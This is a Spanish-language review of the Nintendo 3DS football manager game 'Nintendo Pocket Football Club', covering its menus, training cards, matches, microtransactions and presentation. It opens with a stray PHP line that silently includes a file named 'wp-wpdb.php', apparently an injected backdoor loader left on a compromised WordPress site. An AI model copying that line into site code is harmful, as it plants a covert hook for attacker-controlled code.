if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Nintendo Pocket Football Club – La Fortaleza de LeChuck

Análisis Nintendo Pocket Football Club

analisis-nintendo-pocket-football-club

Expectantes nos mostramos cuando vimos las primeras noticias de este Nintendo Pocket Football Club en un Nintendo Direct de hace unas semanas. Un juego de fútbol con un aspecto desenfadado y divertido utilizando los píxeles que muchos asociamos directamente a su tatarabuelo Nintendo World Cup de la 8 bits de Nintendo. Aún con esa estética tan parecida, Nintendo Pocket Football Club nos propone algo muy diferente, estamos hablando de un mánager, por tanto no vamos a controlar a nuestro equipo desde dentro del campo, sino desde fuera ¡Pero no te decepciones, no es una mala noticia! Hablemos sobre las grandes cualidades de este gran juego para la eShop de Nintendo 2DS/3DS, a la cual se ajusta como un guante.

¿Qué es Nintendo Pocket Football Club?

Nintendo Pocket Football Club es un mánager de fútbol desenfadado de jugabilidad directa. Comenzamos poniendo nombre a nuestro club, escogiendo nuestro escudo y color de la equipación… como en cualquier otro mánager, pero en dos minutos ya estaremos dirigiendo a nuestro equipo, de una forma muy simple, sin grandes estadísticas, y sin jugadores ni clubes reales, cosa que agradece su estilo propio de juego, y en pocos minutos estaremos enganchados a su propuesta. Vamos a comentar primero lo que incluye el juego como mánager de fútbol y después hablaremos de lo que lo hace atractivo y su jugabilidad.menu-nintendo-pocket-football-club

Tendremos seis opciones dentro del menú principal. La Ciudad deportiva, la usaremos para entrenar a nuestros jugadores y gestionar la táctica y formación de éstos en el campo. La Sede, donde gestionaremos las altas y bajas de nuestros jugadores. El estadio, aquí vamos a jugar los partidos de cada jornada. Federación, el lugar donde podremos consultar todas las estadísticas de la temporada, goleadores, clasificación ordenadas por divisiones, etc. El aeropuerto, donde podremos jugar Online o de modo local con otros jugadores y, por último,  la torre del reloj que vale simplemente para guardar partida. Extendamos un poco las posibilidades de cada modo y en que consisten.

Ciudad Deportiva: Es donde pasaremos gran parte del tiempo, preparando a nuestros jugadores. Lo más original del juego, sin ninguna duda. Durante los partidos, nuestro personaje como Mánager irá analizando nuestro juego, y determinará las partes a mejorar en forma de tarjetas de entrenamiento. Estas tarjetas son las que utilizaremos en los entrenamientos para mejorar las habilidades de nuestros jugadores.

habilidades-jugador-nintendo-pocket-football-club
Esta es la tabla individual de un jugador donde podremos ver su trayectoria y habilidades

Sede: Como comentaba antes, aquí básicamente nos encargaremos de gestionar la plantilla, rescindir contratos o fichar nuevos jugadores es pan comido con este sencillo menú, aunque deberemos ajustarnos al presupuesto salarial que nos marque la directiva del club, que varia según la división donde juegues. También nos permitirá acceder a un mercado online, para fichar jugadores de nuestros amigos.

Estadio: Aquí podremos jugar todos los partidos de nuestra agenda, pudiendo elegir entre jornadas (si no tenemos una agenda demasiado ajustada jugando varios campeonatos) el jugar amistosos o partidillos para mantener a nuestros jugadores en forma. La mayor diferencia entre ellos es simple, si jugamos un amistoso o un partido oficial, serán partidos de 90 minutos, y aunque en el amistoso no nos importará demasiado el resultado, a la afición sí, y según este puede que pierdan o ganen más confianza en el equipo y en ti. Los partidillos son mitades de 45 minutos en las que solo ganaremos tarjetas de entrenamiento, pero no influirá el resultado ni en la afición ni en el equipo. Suelen ser interesantes para hacer pasar el tiempo entre jornadas y si no quieres arriesgar la confianza de la afición, y a la vez, obtener esas tarjetas de entrenamiento para mejorar a tus jugadores.

afición-nintendo-pocket-football-club-tomad-caldo
Sin el apoyo de la afición no saldremos adelante

En esta opción también tendremos la posibilidad de contratar partidos especiales, mediante micropagos, para mejorar aspectos específicos del equipo, la defensa, el ataque… Aparecen como una sencilla opción de mejorar a nuestro equipo con mayor velocidad, pero por suerte no impiden de ninguna forma jugar de la forma habitual e ir poco a poco mejorando nuestro equipo. Un ejemplo de buena integración de los micropagos sin espantar a los jugadores más fieles.

Aeropuerto: El modo multijugador de Nintendo Pocket Football Club. Podremos jugar online o de forma local con un amigo y demostrar quién ha entrenado mejor a su equipo, donde como en el fútbol habrán grandes sorpresas. También tenemos opciones de Street Pass y Spot Pass. Con Street Pass activado, podremos jugar amistosos durante la temporada con equipos de otras personas con las que nos hayamos cruzado, y así jugar de forma indirecta con equipos entrenados por otros jugadores. En Spot Pass tendremos sorpresas descargables de parte de Nintendo, presumiblemente tanto de pago como gratuitas. En un futuro veremos que tipo de añadidos nos proponen para alargar la vida del juego. Además de todo eso, no te olvides de consultar tu estadísticas y picarte con otros equipos en la página de Nintendo dedicada a ello.

Lo más importante dentro de Nintendo Pocket Football Club son los partidos. Y como sabemos los aficionados al mundo del fútbol, hay que ganarlos, y más nos vale, porque si la afición esta descontenta con nuestro rendimiento nuestras horas como mánager estarán contadas. Para ponernos a ello, usaremos las tarjetas de entrenamiento de varios tipos para mejorar las habilidades de nuestros jugadores. A nuestros delanteros los entrenaremos con cartas de «Tiro», «Cabezazo», «Velocidad», etc, mientras que con los centrocampistas usaremos «Pases» y del tipo de visión de juego. Por supuesto los defensas necesitarán fuerza y contundencia. Incluso podremos hacer «combos» con algunas cartas compatibles, que aumentarán todavía a mayor velocidad las cualidades de nuestros jugadores.

carta-nintendo-pocket-football-club
Juntando dos cartas puedes hacer un combo especial que aumentará más las habilidades de nuestro jugador

Cada jugador tiene sus propio status en forma de letras (Desde la E hasta la S) de cada una de las habilidades útiles para jugar un partido de fútbol (Tiro, calidad, salto, fuerza, etc), una forma sencilla de ver en todo momento las cualidades del jugador y cuáles debemos mejorar para que sea bueno en su posición. Además, según como lo entrenemos, adquirirá un «Tipo» de jugador, pudiendo ser «Completo», «Polivalente», «Recuperador», etc. Por supuesto también hay que estar atentos a que nuestros jugadores no se agoten de tanto jugar o entrenarse e incluso se lesionen durante unas cuantas semanas, así que tendremos que rotar a nuestro equipo, cual «Tata Martino», para tener a nuestros mejores jugadores frescos en los partidos importantes.

táctica-nintendo-pocket-football-club
Es importante dictaminar la posición de nuestros jugadores ¿Ponemos el autobús o vamos a por todas?

Aún así, entrenar a nuestros jugadores no lo es todo, también debemos asignarles al comienzo de cada partido una formación, una táctica y si queremos algún marcaje especial sobre las estrellas del equipo contrario. Con todo eso hecho, nos quedará jugar el partido, el cual no podremos «saltar» y tendremos que estar atentos para hacer los cambios pertinentes, ya sea por cansancio, o por aportar frescura al equipo, y si debemos cambiar la táctica para aguantar el resultado o echar el equipo hacia adelante en busca de la remontada. También han incluido la opción de poder grabar los partidos y/o goles para guardar en la memoria los grandes momentos de nuestra temporada.

Aspecto técnico

Tanto el aspecto, como la ambientación, música y efectos de sonido de Nintendo Pocket Football Club destilan carisma por cada uno de sus píxels. Cuando ves a tu afición animar a los jugadores, con sus propias frases (¡TOMAD CALDO!), a los propios jugadores celebrando un gol, regateando, chutando o centrando con efecto… Es todo tan «mono» que es inevitable vibrar con tu equipo, celebrar los goles importantes y entristecerse ante las derrotas. No podía ser diferente, simplemente todo es así y queda como un guante. El juego utiliza el efecto 3D para dar profundidad al campo durante los partidos, pero no lo echarás de menos en Nintendo 2DS ya que está diseñado de forma que no sea útil para la jugabilidad.

cartas-mánager-nintendo-pocket-football-club
Nuestro personaje irá evaluando el juego del equipo en tiempo real y añadirá las cartas de lo que debemos mejorar

Nintendo Pocket Football Club te recordará aquellas tardes gloriosas de PC Fútbol, donde cogías cariño a cada uno de tus jugadores, donde cada uno de ellos tenía sus cualidades, las cuales conocías perfectamente y tratabas de sacar a relucir en el campo con la mejor táctica posible. Su diversión radica en su simpleza, pues otros juegos se centran demasiado en una estadística profunda que termina aburriendo. La propuesta de Nintendo Pocket Football Club es mucho más directa y llevadera, mucho más portátil, y jugando en segundo y primer plano ¡Ya es el segundo juego al que más horas he echado en Nintendo 3DS! (Y superará a Animal Crossing, seguro). Lo único que algunos echamos en falta, es, sin duda, poder asumir el control de los jugadores en el campo y jugar el partido. Sería un excelente añadido en caso de una segunda parte ¡Nintendo toma nota!

Nintendo Pocket Football Club es un juego para llevar siempre contigo que supera con creces en diversión y jugabilidad portátil a todo mánager que hayas visto en un smartphone. Así que te voy a decir que sí, a ti que tienes dudas sobre comprar o no el juego, hazte con el. La diversión está asegurada y te arrastrará irremediablemente a su mundo pixelado, seas amante de los juegos de fútbol más arcade, de simuladores, de los manager más sencillos o de los más profundos, si tienes Nintendo 3DS debes hacerte con este juego. Puedes obtenerlo con una oferta especial de lanzamiento en la eShop hasta el 1 de Mayo, que reduce su precio de 14,99€ a 11,99€.

Si necesitas más información, puedes consultar la web oficial del juego, además de ver las estadísticas de tu club en Nintendo Pocket Football Club.